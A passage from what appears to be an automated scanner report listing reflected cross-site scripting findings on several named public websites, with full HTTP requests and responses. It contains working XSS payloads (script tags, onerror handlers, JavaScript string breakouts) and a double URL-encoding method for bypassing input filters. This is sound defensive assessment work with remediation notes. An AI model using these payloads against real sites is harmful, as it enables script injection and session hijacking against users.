Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /show/154c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e349839c022/00056590007964CIO58HH9JQ1JV/ HTTP/1.1 Host: resources.cio.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d9e0%2522%253balert%25281%2529%252f%252f33197a93f3 was submitted in the REST URL parameter 3. This input was echoed as 8d9e0";alert(1)//33197a93f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /show/200000223/00056590007964CIO58HH9JQ1JV8d9e0%2522%253balert%25281%2529%252f%252f33197a93f3/ HTTP/1.1 Host: resources.cio.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6193f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e55bb0344024 was submitted in the REST URL parameter 3. This input was echoed as 6193f"><script>alert(1)</script>55bb0344024 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /show/200000223/6193f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e55bb0344024/ HTTP/1.1 Host: resources.cio.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c0fa%2522%253balert%25281%2529%252f%252f51efbad8729 was submitted in the REST URL parameter 2. This input was echoed as 8c0fa";alert(1)//51efbad8729 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /show/2000002248c0fa%2522%253balert%25281%2529%252f%252f51efbad8729/00056590007963CIOS94WBH8V1I/ HTTP/1.1 Host: resources.cio.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0217%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e694a86a3811 was submitted in the REST URL parameter 2. This input was echoed as e0217"><script>alert(1)</script>694a86a3811 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /show/e0217%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e694a86a3811/00056590007963CIOS94WBH8V1I/ HTTP/1.1 Host: resources.cio.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf280%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edb3887e864 was submitted in the REST URL parameter 3. This input was echoed as bf280"><script>alert(1)</script>db3887e864 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /show/200000224/bf280%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edb3887e864/ HTTP/1.1 Host: resources.cio.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75f50%2522%253balert%25281%2529%252f%252f8667a0fba70 was submitted in the REST URL parameter 3. This input was echoed as 75f50";alert(1)//8667a0fba70 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /show/200000224/00056590007963CIOS94WBH8V1I75f50%2522%253balert%25281%2529%252f%252f8667a0fba70/ HTTP/1.1 Host: resources.cio.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 805c7%2522%253balert%25281%2529%252f%252fe2b49d6cd85 was submitted in the REST URL parameter 2. This input was echoed as 805c7";alert(1)//e2b49d6cd85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /show/200000225805c7%2522%253balert%25281%2529%252f%252fe2b49d6cd85/00056590007961CIOFJENR82NVR/ HTTP/1.1 Host: resources.cio.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c0ae%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea11ddcb6f84 was submitted in the REST URL parameter 2. This input was echoed as 3c0ae"><script>alert(1)</script>a11ddcb6f84 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /show/3c0ae%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea11ddcb6f84/00056590007961CIOFJENR82NVR/ HTTP/1.1 Host: resources.cio.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 540a7%2522%253balert%25281%2529%252f%252f5289850d27 was submitted in the REST URL parameter 3. This input was echoed as 540a7";alert(1)//5289850d27 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /show/200000225/00056590007961CIOFJENR82NVR540a7%2522%253balert%25281%2529%252f%252f5289850d27/ HTTP/1.1 Host: resources.cio.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4451d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8452a81c58e was submitted in the REST URL parameter 3. This input was echoed as 4451d"><script>alert(1)</script>8452a81c58e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /show/200000225/4451d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8452a81c58e/ HTTP/1.1 Host: resources.cio.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 573c4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cd3158d9e7 was submitted in the REST URL parameter 2. This input was echoed as 573c4"><script>alert(1)</script>5cd3158d9e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /show/573c4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cd3158d9e7/00026040004262CIOJFKVLDIMHW/ HTTP/1.1 Host: resources.cio.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4fb4%2522%253balert%25281%2529%252f%252fc285f21ee99 was submitted in the REST URL parameter 2. This input was echoed as a4fb4";alert(1)//c285f21ee99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /show/51117387a4fb4%2522%253balert%25281%2529%252f%252fc285f21ee99/00026040004262CIOJFKVLDIMHW/ HTTP/1.1 Host: resources.cio.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 168f1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3260104c6d0 was submitted in the REST URL parameter 3. This input was echoed as 168f1"><script>alert(1)</script>3260104c6d0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /show/51117387/168f1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3260104c6d0/ HTTP/1.1 Host: resources.cio.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59c78%2522%253balert%25281%2529%252f%252f078199a6681 was submitted in the REST URL parameter 3. This input was echoed as 59c78";alert(1)//078199a6681 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /show/51117387/00026040004262CIOJFKVLDIMHW59c78%2522%253balert%25281%2529%252f%252f078199a6681/ HTTP/1.1 Host: resources.cio.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.289. http://track.adform.net/adfscript/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://track.adform.net
Path:
/adfscript/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload af3bc<script>alert(1)</script>a056544fd55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adfscript/?af3bc<script>alert(1)</script>a056544fd55=1 HTTP/1.1 Host: track.adform.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=6773413839606691049; C=1; cid=6773413839606691049,0,0,0,0;
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 16 Dec 2010 14:16:49 GMT Server: Microsoft-IIS/6.0 P3P: CP="NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR LEG NAV INT" X-Powered-By: ASP.NET Content-Length: 483 Content-Type: text/javascript Expires: Thu, 16 Dec 2010 14:31:49 GMT Cache-control: private
Adform=window.Adform||{};Adform.host="http://track.adform.net";Adform.ADFBannerData={URL:"http://track.adform.net/adfserve/?af3bc<script>alert(1)</script>a056544fd55=1",CREFURL:"",BN:""}; if(!Adform.ADFBannerParams)Adform.ADFBannerParams=[];Adform.ADFBannerParams.push(Adform.ADFBannerData); typeof Adform.ADFUtilInstance=="undefined"?document.write('<scr'+'ipt ty ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbb85"><img%20src%3da%20onerror%3dalert(1)>ce95d2d6793 was submitted in the REST URL parameter 5. This input was echoed as cbb85"><img src=a onerror=alert(1)>ce95d2d6793 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /jct03001c/services/learning/ites.wss/uscbb85"><img%20src%3da%20onerror%3dalert(1)>ce95d2d6793/en HTTP/1.1 Host: www-304.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK connection: close content-language: en-US content-type: text/html; charset=UTF-8 date: Thu, 16 Dec 2010 14:08:29 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server/6.1.0.27 Apache/2.0.47 x-old-content-length: 11184 cache-control: no-cache="set-cookie, set-cookie2" expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=0001yZpiLh_UPLdRUAqdZCqsEJj:13ac135kr; Path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4413c"><img%20src%3da%20onerror%3dalert(1)>04f3725b37f was submitted in the REST URL parameter 6. This input was echoed as 4413c"><img src=a onerror=alert(1)>04f3725b37f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /jct03001c/services/learning/ites.wss/us/en4413c"><img%20src%3da%20onerror%3dalert(1)>04f3725b37f HTTP/1.1 Host: www-304.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK connection: close content-language: en-US content-type: text/html; charset=UTF-8 date: Thu, 16 Dec 2010 14:08:33 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server/6.1.0.27 Apache/2.0.47 x-old-content-length: 11138 cache-control: no-cache="set-cookie, set-cookie2" expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=00016Y5lBciWwuc73DZoHf_nE8B:13ac135kr; Path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0b3f"><img%20src%3da%20onerror%3dalert(1)>0f4699bc14f was submitted in the REST URL parameter 5. This input was echoed as f0b3f"><img src=a onerror=alert(1)>0f4699bc14f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /jct03001c/services/learning/ites.wss/zzf0b3f"><img%20src%3da%20onerror%3dalert(1)>0f4699bc14f/en HTTP/1.1 Host: www-304.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK connection: close content-language: en-US content-type: text/html; charset=UTF-8 date: Thu, 16 Dec 2010 14:08:30 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server/6.1.0.27 Apache/2.0.47 x-old-content-length: 11184 cache-control: no-cache="set-cookie, set-cookie2" expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=0001xoF-An8FzUquT3QhHWjDT-s:13ac1377u; Path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9447"><img%20src%3da%20onerror%3dalert(1)>766c6ad99cd was submitted in the REST URL parameter 6. This input was echoed as f9447"><img src=a onerror=alert(1)>766c6ad99cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /jct03001c/services/learning/ites.wss/zz/enf9447"><img%20src%3da%20onerror%3dalert(1)>766c6ad99cd HTTP/1.1 Host: www-304.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK connection: close content-language: en-US content-type: text/html; charset=UTF-8 date: Thu, 16 Dec 2010 14:07:28 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server/6.1.0.27 Apache/2.0.47 x-old-content-length: 11136 cache-control: no-cache="set-cookie, set-cookie2" expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=00014FS_lcEdJ2JsRqcMBi4XSt3:13ac135kr; Path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
2.294. http://www.aaaa.org/pages/eweb.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.aaaa.org
Path:
/pages/eweb.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9756'%3balert(1)//d0ad3027f6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b9756';alert(1)//d0ad3027f6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pages/eweb.aspx?b9756'%3balert(1)//d0ad3027f6d=1 HTTP/1.1 Host: www.aaaa.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 16 Dec 2010 13:37:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private, max-age=0 Expires: Wed, 01 Dec 2010 13:37:43 GMT Last-Modified: Thu, 16 Dec 2010 13:37:43 GMT Content-Type: text/html; charset=utf-8 Content-Length: 33630
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" di ...[SNIP]... ht) { document.getElementById('eWebFrame').style.height = parseInt(height) + "px"; } //Set the initial src of the iFrame var frmSrc = 'http://ams.aaaa.org/eWeb/DynamicPage.aspx?b9756';alert(1)//d0ad3027f6d=1';
var posPound = frmSrc.indexOf('?'); var urlLeft = frmSrc.substring(0, posPound + 1);
if (window.location.href.indexOf('#') > ...[SNIP]...
2.295. https://www.aaaa.org/pages/eweb.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.aaaa.org
Path:
/pages/eweb.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23515'%3balert(1)//3901cee2e8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 23515';alert(1)//3901cee2e8f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pages/eweb.aspx?23515'%3balert(1)//3901cee2e8f=1 HTTP/1.1 Host: www.aaaa.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=93399053.1292507154.2.2.utmcsr=aaaa.org|utmccn=(referral)|utmcmd=referral|utmcct=/pages/eweb.aspx; __utma=93399053.178918647.1292504938.1292504938.1292507154.2; __utmc=93399053; __utmb=93399053.2.10.1292507154;
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 16 Dec 2010 14:09:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private, max-age=0 Expires: Wed, 01 Dec 2010 14:09:50 GMT Last-Modified: Thu, 16 Dec 2010 14:09:50 GMT Content-Type: text/html; charset=utf-8 Content-Length: 33632
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" di ...[SNIP]... ht) { document.getElementById('eWebFrame').style.height = parseInt(height) + "px"; } //Set the initial src of the iFrame var frmSrc = 'http://ams.aaaa.org/eWeb/DynamicPage.aspx?23515';alert(1)//3901cee2e8f=1';
var posPound = frmSrc.indexOf('?'); var urlLeft = frmSrc.substring(0, posPound + 1);
if (window.location.href.indexOf('#') > ...[SNIP]...
2.296. http://www.adotas.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.adotas.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d47bf"><script>alert(1)</script>af053186cf7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d47bf\"><script>alert(1)</script>af053186cf7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?d47bf"><script>alert(1)</script>af053186cf7=1 HTTP/1.1 Host: www.adotas.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:17:05 GMT Server: Apache X-Powered-By: PHP/5.2.10 X-Pingback: http://www.adotas.com/wp/xmlrpc.php Cache-Control: max-age=7200 Expires: Thu, 16 Dec 2010 15:17:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 77988
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a532"><script>alert(1)</script>37045e53b7d was submitted in the REST URL parameter 3. This input was echoed as 4a532\"><script>alert(1)</script>37045e53b7d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
